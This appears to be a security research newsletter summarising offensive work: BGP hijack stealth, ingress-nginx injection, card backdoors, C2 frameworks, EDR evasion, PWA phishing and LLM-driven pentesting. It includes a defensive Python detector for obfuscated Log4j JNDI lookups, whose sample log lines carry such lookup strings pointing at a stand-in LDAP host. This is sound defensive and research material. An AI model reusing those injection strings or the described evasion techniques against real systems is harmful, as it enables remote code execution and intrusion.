As the deployment of comprehensive Border Gateway Protocol (BGP) security measures is still in progress, BGP monitoring continues to play a critical role in protecting the Internet from routing attacks. Fundamentally, monitoring involves observing BGP feeds to detect suspicious announcements and taking defensive action. However, BGP monitoring relies on seeing the malicious BGP announcement in the first place! In this paper, we develop a novel attack that can hide itself from all state-of-the-art BGP monitoring systems we tested while affecting the entire Internet. The attack involves launching a sub-prefix hijack with the RFC-specified NO_EXPORT community attached to prevent networks with the malicious route installed from sending the route to BGP monitoring systems. We study the viability of this attack at four tier-1 networks and find all networks we studied were vulnerable to the attack. Finally, we propose a mitigation that significantly improves the robustness of the BGP monitoring ecosystem.

https://arxiv.org/pdf/2408.09622

Interesting vulnerability where a stray carriage return (\r) can cause real pain. Don’t let a Kubernetes pod get compromised, or it could get really painful.

The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects. Annotations in Kubernetes are used to attach arbitrary non-identifying metadata to objects. In the case of ingress-nginx, annotations are used to configure various behaviors of the ingress controller.

The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller’s credentials, which, in default configurations, has access to all secrets in the cluster.

..

The attacker creates an Ingress object with a specially crafted annotation that includes a carriage return (\r) character to bypass validation. This allows the injection of unauthorized content and potential XSS attacks. For example:

https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/

Philippe Teuwen details a long-latent issue..

MIFARE Classic smart cards, developed and licensed by NXP, are widely used but have been subjected to numerous attacks over the years. Despite the introduction of new versions, these cards have remained vulnerable, even in card-only scenarios. In 2020, the FM11RF08S, a new variant of MIFARE Classic, was released by the leading Chinese manufacturer of unlicensed “MIFARE compatible” chips. This variant features specific countermeasures designed to thwart all known card-only attacks and is gradually gaining market share worldwide. In this paper, we present several attacks and unexpected findings regarding the FM11RF08S. Through empirical research, we discovered a hardware backdoor and successfully cracked its key. This backdoor enables any entity with knowledge of it to compromise all user-defined keys on these cards without prior knowledge, simply by accessing the card for a few minutes. Additionally, our investigation into older cards uncovered another hardware backdoor key that was common to several manufacturers.

https://eprint.iacr.org/2024/1275.pdf

A Chinese analysis of various small satellites and their vulnerability.

https://mp-weixin-qq-com.translate.goog/s/wgBFJm5lCwrIcGXfXUy3TQ?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

Attack capability, techniques and trade-craft.

Alon Leviev releases a tool for which we can expect adversarial use in 3..2..

A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities

https://github.com/SafeBreach-Labs/WindowsDowndate

From China..

Internal of Malice (Evil Network) strives to implement a post-exploit infrastructure that is compatible with CS, MSF, and Sliver ecosystems, while providing higher scalability and concealment, and a set of engineering solutions.

C2 is more challenging than other areas, both in design and implementation.

What we want to try to design is the next generation of C2, a C2 framework that is more advanced in terms of interactive experience, scalability, port confrontation, traffic confrontation, etc.

Currently, v0.0.1 is still a long way from the complete form of the design goal. However, due to the development progress, we decided to accept the opinions from the community first. We cannot create the most advanced tools in isolation.

https://chainreactors.github.io/wiki/IoM/

An overview article has been published:

Summarizes some core design concepts of the next generation C2.

  • Rust is the ideal language for the next generation of C2, providing low-level operation capabilities, cross-platform compilation, and the ability to modify almost all features.

  • Modular, hot-swappable, and highly customizable implant design. We break down all functions into building blocks, and use the features and conditional compilation provided by Rust to achieve any combination.

  • Support webshell, and open up the underlying operation capabilities, reuse C2’s plug-in ecosystem, such as the assembly-execute capability of the CLR ecosystem, Java’s JNI and JVMTI, etc.

  • OPSEC first, and open OPSEC custom interfaces as much as possible

  • Highly controllable flow rate

  • From C2 to bootkit/rootkit

  • Listeners and servers should be decoupled, and the next generation of C2 should be distributed by nature

  • Compatibility with existing C2 ecosystems, such as CobaltStrike’s BOF, Sliver’s Armory, etc.

  • ……

https://mp-weixin-qq-com.translate.goog/s/qaO2pC_BlL4tKlbZlYh4CQ?_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

Jakub Osmani details an interesting and rather novel mobile offensive technique here. Now that it has been reported we should expect an uptick..

  • Standard phishing delivery techniques were combined with a novel method of phishing; targeting Android and iOS users via PWAs, and on Android also WebAPKs.

  • Insidiously, installing a PWA/WebAPK application does not warn the victim about installing a third-party application.

  • On Android, these phishing WebAPKs even appear to have been installed from the Google Play store.

  • Most of the observed applications targeted clients of Czech banks, but we also observed one phishing app that targeted a Hungarian bank and another targeting a Georgian bank.

  • Based on the C&C servers utilized and backend infrastructure, we conclude that two different threat actors were operating the campaigns.

  • Thanks to our discovery of operator panels on different domains, we were able to notify the victims’ banks in order to protect them.

https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/

Qisheng Jiang and Chundong Wang show the subtlety of what is possible..

We accordingly build a covert channel named Sync+Sync. Sync+Sync delivers a transmission bandwidth of 20,000 bits per second at an error rate of about 0.40% with an ordinary solid-state drive. Sync+Sync can be conducted in cross-disk partition, cross-file system, cross-container, cross-virtual machine, and even cross-disk drive fashions, without sharing data between programs. Next, we launch side-channel attacks with Sync+Sync and manage to precisely detect operations of a victim database (e.g., insert/update and B-Tree node split).

https://www.usenix.org/system/files/sec23winter-prepub-554-jiang.pdf

Helvio Junior highlights a gap in EDRs; it will be interesting to see how quickly it is addressed.

Through a precise combination of IAT Hooking techniques, dynamic SSN resolution, and indirect system calls, HookChain redirects the execution flow of Windows subsystems in a way that remains invisible to the vigilant eyes of EDRs that only act on Ntdll.dll, without requiring changes to the source code of the applications and malwares involved.

https://github.com/helviojunior/hookchain/

What is being exploited.

Shwetanjali Rasal details the vulnerability exploited by this ransomware actor..

Brontoo Technology Solutions filed a report with CERT-In (Indian Computer Emergency Response Team) which revealed that the attack originated from a misconfigured Jenkins server, setting off the chain of events. On further analysis, the threat actor leveraged CVE-2024-23897 to gain initial unauthorized access to the victim’s environment.

The Hidden Door: How CVE-2024-23897 Enabled Ransomware Attack on Indian Banks

Andy Giron, Frederic Baguelin, Eslam Salem and Matt Mills highlight the risk from zombie vulnerabilities… the long tail of exploitation, even for high-profile vulnerabilities, is indeed long.

  • Despite being over two years old, the Log4j vulnerability (Log4Shell) remains a persistent and evolving threat, as demonstrated by a recent opportunistic campaign leveraging it for crypto-mining and system compromise.

  • The attack uses obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.

  • The script establishes persistence, performs system reconnaissance, and exfiltrates data, maintaining control through multiple backdoors and encrypted communication channels.

https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/
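The Datadog write-up above notes that the campaign's JNDI lookup strings (the ones that trigger the outbound LDAP requests) are obfuscated with nested Log4j lookups, which defeats naive string matching on `${jndi:`. The following is an added example, not code from the article or its authors, of how a detection pipeline can normalise those lookups before matching. The access-log lines are constructed for the example (reserved documentation IPs and an `.invalid` hostname), and the obfuscation forms it undoes (`${lower:}`/`${upper:}`, the `${key:-default}` default-value syntax, and URL encoding) are the publicly documented Log4j lookup syntaxes rather than anything specific to this campaign.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the Datadog article). Line 1 is benign,
# lines 2-4 carry a JNDI lookup in the User-Agent field in plain and obfuscated forms,
# line 5 carries a non-JNDI lookup so we can see it is not reported.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [20/Aug/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [20/Aug/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.12 - - [20/Aug/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '203.0.113.13 - - [20/Aug/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/a}"',
    '203.0.113.14 - - [20/Aug/2024:10:00:05 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/8.0"',
]

# ${lower:x} / ${upper:x} -> x (case is folded at the end anyway)
LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} -> x, which also covers the empty-key form ${::-x}
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# A fully resolved JNDI lookup, capturing the scheme (ldap, rmi, dns, ...)
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):[^{}]*\}", re.IGNORECASE)


def normalise_lookups(text, max_rounds=20):
    """Undo lookup-based obfuscation layered on top of a ${jndi:...} string.

    URL encoding is decoded first. Because both regexes only match lookups that
    contain no nested braces, the innermost lookups resolve first; the loop then
    repeats until the string stops changing (or max_rounds is hit, to bound
    work on adversarial input). The result is lower-cased for matching.
    """
    text = unquote(text)
    for _ in range(max_rounds):
        new = LOWER_UPPER.sub(lambda m: m.group(1), text)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def scan_line(line):
    """Return a finding dict if the line contains a JNDI lookup once normalised, else None."""
    norm = normalise_lookups(line)
    m = JNDI_LOOKUP.search(norm)
    if not m:
        return None
    return {
        "scheme": m.group(1),
        # the literal form was absent from the raw line, so some obfuscation was used
        "obfuscated": "${jndi:" not in line.lower(),
        "normalised": m.group(0),
    }


def scan_log(lines):
    """Scan an iterable of log lines; returns a list of (line_number, finding)."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = scan_line(line)
        if finding:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG_LINES):
        print(number, finding)
```

Matching on the normalised string rather than the raw line is the point: the same rule then fires on the plain, `${lower:}`-wrapped and `${::-x}`-built variants alike. In production you would also want to flag any `${...}` lookup arriving in user-controlled fields (the `${env:HOME}` line here is left unreported only to show that the JNDI rule itself is specific), and treat the detection as a trigger to check outbound LDAP/RMI connections from the application host.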

Low level tooling and techniques for attack and defence researchers…

Emre Güler, Sergej Schumilo, Moritz Schloegel, Nils Bars, Philipp Görz, Xinyi Xu, Cemal Kaygusuz, and Thorsten Holz show that tailored fuzzers can bring performance gains..

In this paper, we present ATROPOS, a snapshot-based, feedback-driven fuzzing method tailored for PHP-based web applications. Our approach considers the challenges associated with web applications, such as maintaining session state and generating highly structured inputs. Moreover, we propose a feedback mechanism to automatically infer the key-value structure used by web applications. Combined with eight new bug oracles, each covering a common class of vulnerabilities in server-side web applications, ATROPOS is the first approach to fuzz web applications effectively and efficiently. Our evaluation shows that ATROPOS significantly outperforms the current state of the art in web application testing. In particular, it finds, on average, at least 32% more bugs, while not reporting a single false positive on different test suites. When analyzing real-world web applications, we identify seven previously unknown vulnerabilities that can be exploited even by unauthenticated users.

https://www.usenix.org/system/files/sec23winter-prepub-167-guler.pdf

Robin Kirchner, Jonas Möller, Marius Musch, David Klein, Konrad Rieck and Martin Johns show that niche bugs/techniques applied to a large enough population will get you something.

Based on these polyglots, we conduct a study of BXSS vulnerabilities on the Tranco Top 100,000 websites. We discover 20 vulnerabilities in 18 web-based backend systems. These findings demonstrate the efficacy of our detection approach and point at a largely unexplored attack surface in web security.

https://www.usenix.org/system/files/sec23winter-prepub-226-kirchner-rev.pdf

An AI-Driven Pentesting Solution from China

It has been verified that the application of LLM in penetration testing is feasible. The following four points have a decisive influence on the final effect:

  1. For the selection of large models, it is sufficient as long as the parameters are large. There is no need to pay too much attention to whether the model has been fine-tuned for a specific field. The knowledge of a specific field can be solved by using RAG.

  2. RAG is equivalent to an external knowledge base that is independent of LLM. As long as the private knowledge base is complete enough, its “experience” will be rich enough.

  3. Prompts simulate various roles, such as hacker, security researcher, security engineer, etc., so that the LLM can better understand our needs.

  4. The richer the external tool arsenal, the better.

https://github.com/hangxin1940/bladerazor

Rolf Rolles provides a source of SRE insight..

this blog entry is about a different kind of C++ exception metadata: namely, wind and unwind. In the remainder of this blog entry, we introduce wind and unwind metadata — what it is, and when and why the compiler inserts it — before describing how to exploit it when reverse engineering C++ programs.

https://www.msreverseengineering.com/blog/2024/8/20/c-unwind-metadata-1

Some other small (and not so small) bits and bobs which might be of interest.

Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.

This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.
